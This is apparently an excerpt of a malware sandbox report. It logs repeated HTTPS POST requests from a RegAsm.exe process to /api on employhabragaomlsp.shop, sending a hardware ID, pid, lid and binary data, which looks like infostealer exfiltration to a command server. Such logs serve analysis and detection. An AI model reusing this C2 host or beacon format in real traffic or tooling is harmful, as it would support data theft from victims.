                                2024-05-23 22:22:06 UTC1369INData Raw: 31 65 30 33 0d 0a 33 66 49 50 79 65 76 4b 42 72 33 68 57 6c 58 74 42 4e 6e 36 6e 62 4a 6f 4f 56 6c 68 38 56 70 4c 71 6e 5a 61 6e 4e 71 4b 70 4e 39 64 59 67 6e 4b 34 64 4f 64 72 6d 4b 64 78 6e 71 51 79 76 47 5a 39 2b 72 39 43 6a 6a 70 58 46 75 79 72 52 32 46 67 46 48 31 58 35 39 7a 48 46 71 68 77 30 5a 33 4f 6b 78 45 50 51 52 66 34 73 68 2b 49 66 50 5a 38 79 35 59 47 72 47 76 6d 55 51 41 45 4c 46 64 32 6d 49 46 77 4c 59 44 52 6e 63 6d 78 6c 38 68 78 45 67 78 53 47 48 36 4c 34 75 34 61 74 33 62 4d 75 31 66 51 6b 41 53 39 39 37 66 73 39 30 65 38 78 52 65 72 2b 42 66 78 2f 6c 55 53 6e 4a 59 4e 4b 71 76 6d 75 48 78 52 30 67 78 71 6f 7a 51 30 4d 42 39 6c 6c 75 33 6e 55 72 35 46 52 6e 76 59 56 39 41 65 64 51 4a 4e 39 73 7a 2b 71 57 54 76 44 67 48 67 76 59 32 68
                                Data Ascii: 1e033fIPyevKBr3hWlXtBNn6nbJoOVlh8VpLqnZanNqKpN9dYgnK4dOdrmKdxnqQyvGZ9+r9CjjpXFuyrR2FgFH1X59zHFqhw0Z3OkxEPQRf4sh+IfPZ8y5YGrGvmUQAELFd2mIFwLYDRncmxl8hxEgxSGH6L4u4at3bMu1fQkAS997fs90e8xRer+Bfx/lUSnJYNKqvmuHxR0gxqozQ0MB9llu3nUr5FRnvYV9AedQJN9sz+qWTvDgHgvY2h
                                2024-05-23 22:22:06 UTC1369INData Raw: 32 48 73 35 68 68 63 43 72 41 4e 33 39 39 6f 7a 52 36 49 35 54 4b 49 68 32 37 75 2b 66 61 33 2b 4a 44 75 55 34 53 52 4c 55 79 6d 34 5a 54 65 67 46 48 43 76 4b 42 72 33 6c 44 46 50 72 67 4e 70 6f 51 71 30 36 75 78 6c 74 2b 77 32 4a 38 2b 2f 63 68 67 50 51 73 46 6f 66 38 74 70 61 6f 42 39 54 35 61 50 65 68 76 68 58 69 7a 33 58 2f 36 6e 39 53 6e 69 6f 58 31 65 2f 36 64 77 46 51 39 47 78 57 73 35 68 68 63 43 72 41 4e 2b 39 39 6f 7a 4c 71 77 5a 5a 2f 59 76 74 38 47 56 5a 66 66 75 4c 69 4b 42 68 33 41 56 44 30 62 46 61 7a 54 70 63 6d 4c 4c 54 6e 36 38 77 6a 39 2f 68 7a 70 6e 7a 79 47 48 36 4b 35 72 68 38 55 64 49 4d 57 6a 4d 30 4e 44 45 59 45 68 4c 4a 73 6f 4f 5a 55 72 47 71 6a 4d 47 58 7a 31 4f 55 79 69 49 63 6e 71 70 6d 65 39 34 42 34 4c 71 76 4a 68 57 31 6b
                                Data Ascii: 2Hs5hhcCrAN399ozR6I5TKIh27u+fa3+JDuU4SRLUym4ZTegFHCvKBr3lDFPrgNpoQq06uxlt+w2J8+/chgPQsFof8tpaoB9T5aPehvhXiz3X/6n9SnioX1e/6dwFQ9GxWs5hhcCrAN+99ozLqwZZ/Yvt8GVZffuLiKBh3AVD0bFazTpcmLLTn68wj9/hzpnzyGH6K5rh8UdIMWjM0NDEYEhLJsoOZUrGqjMGXz1OUyiIcnqpme94B4LqvJhW1k


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.649721188.114.96.34436472C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:06 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 12854
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:06 UTC12854OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:06 UTC814INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:06 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=7r6k52der71vg75hlf5p53hf58; expires=Mon, 16-Sep-2024 16:08:45 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gmt8uNTBqnYBYPm%2FnjNhAq2fsVxCZj6I3HKyAhfotrTHL7IFTDncQcuNa%2FzQ2VuNm19UYuMhF8gMCGg0oaERjhkfw2uY%2Bkke20pvXSoKsicGZOZDqZcSkc0hC3h6rSHq2r%2F5hAnpK0eq4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88887159b8634310-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.649722188.114.96.34434340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:06 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 12854
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:06 UTC12854OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:08 UTC812INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:08 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=togi3926uv0me3n10eop19ip7q; expires=Mon, 16-Sep-2024 16:08:46 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qic8M4tsuqs8e56g%2FTHgHvhmKyBodRDWLzxfsvIJnlQ03Mke1v09CyHbsrubmECly6wl213QBPxcBLY7CSOCsqxhFLtovAkTQ1JqU7rtoGs9Gs7epTfk8L%2FLHB6Xc%2BlTPfsS1hc0QKog2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8888715d08187ca6-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.649723188.114.96.3443500C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:07 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 12854
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:07 UTC12854OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:08 UTC818INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:08 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=1252rsumk0q2lp2b5pn75vsqvd; expires=Mon, 16-Sep-2024 16:08:46 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VVLDTJymzdjhOlzuP1sSaco%2FH6PHO4v2ZDPha3ac9cCa%2BijKeaH6jeBKsV6jE%2B2Ttyv5YyVBXq2PZR%2Bc4JFp4p%2F6fEzChP7jDvVdUEguAYhv0BVhA3P61a8c%2BSnuGaRs6oQZVoBWEYfTZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8888715f6c73c348-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.649724188.114.96.34436472C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:07 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 15100
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:07 UTC15100OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:08 UTC812INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:08 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=i62u2vnvqi7qd624jpbna1fu2q; expires=Mon, 16-Sep-2024 16:08:46 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RDLr5xctBb178Xtei7zUtsnf91URYT0tVM4LSCrADLIClj8nf%2BMLOsS8QWaZut1TMyNYnERHX%2FWd%2BZbkoVs4dn2eTOhNCmJx1dbsJPAdrmFtxlmfRVGrsSs853jSOYbZdLSouj8GuGzoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871605f4418ea-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.649726188.114.96.34436472C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:10 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 19958
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:10 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:10 UTC4627OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5
                                Data Ascii: +?2+?2+?o?Mp5p_
                                2024-05-23 22:22:14 UTC822INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:14 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=3j6qh7a820r273b51nnljsgvuk; expires=Mon, 16-Sep-2024 16:08:49 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXvTed%2FAO1ZjxUV9Dj%2BlkxUrRdC1R5i%2Fsa2%2BxU3mkp4k7ReLGHi0lXorbwKHKLcyX0Tf4kukH7bdNRJNrUGTTXeBi%2FYSha6%2Bu1IM9D4bY%2FhjeYpPVwX%2BZXTZFcSQYzSpgPzfIAjInzscTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 888871720d4317e1-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.649729188.114.96.3443500C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:10 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 15100
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:10 UTC15100OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:10 UTC816INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:10 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=vvrk0i99613okfurpffos54eqs; expires=Mon, 16-Sep-2024 16:08:49 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4O2Ix71tuDOp3w0ypYfM2xmVTwH205eIcpoZV8rrfH3F%2F%2FH8HBIRpIMdh9ubFvLxNTpiXiWjECH%2FF%2FeqlEc0ZnfkvAcTnX0Ep23U0UpgN9ZbGFr7BL6AxPwxHYDguq%2BLbKc3iqHXp0QvLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 88887172887a42d5-EWR
                                alt-svc: h3=":443"; ma=86400
                                2024-05-23 22:22:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                Data Ascii: fok 8.46.123.175
                                2024-05-23 22:22:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.649732188.114.96.3443500C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                TimestampBytes transferredDirectionData
                                2024-05-23 22:22:11 UTC289OUTPOST /api HTTP/1.1
                                Connection: Keep-Alive
                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                Content-Length: 19958
                                Host: employhabragaomlsp.shop
                                2024-05-23 22:22:11 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                2024-05-23 22:22:11 UTC4627OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5
                                Data Ascii: +?2+?2+?o?Mp5p_
                                2024-05-23 22:22:11 UTC814INHTTP/1.1 200 OK
                                Date: Thu, 23 May 2024 22:22:11 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: PHPSESSID=2fmn7b191h120m421c2jj2ao96; expires=Mon, 16-Sep-2024 16:08:50 GMT; Max-Age=9999999; path=/
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                CF-Cache-Status: DYNAMIC
